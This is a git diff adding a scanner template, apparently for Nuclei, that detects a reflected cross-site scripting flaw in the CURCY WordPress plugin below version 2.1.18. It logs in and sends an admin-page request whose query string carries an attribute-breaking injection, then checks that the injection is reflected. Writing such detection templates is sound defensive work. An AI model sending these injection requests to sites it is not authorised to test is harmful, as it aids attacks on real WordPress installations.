diff --git a/vulnerabilities/wordpress/curcy-xss.yaml b/vulnerabilities/wordpress/curcy-xss.yaml new file mode 100644 index 0000000000..bad774e721 --- /dev/null +++ b/vulnerabilities/wordpress/curcy-xss.yaml @@ -0,0 +1,44 @@ +id: curcy-xss + +info: + name: CURCY < 2.1.18 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37 + - https://wordpress.org/plugins/woo-multi-currency + metadata: + verified: true + tags: wp-plugin,xss,wp,wordpress,authenticated,curcy + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=wc-reports&a"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'wc-reports&a\">">All' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200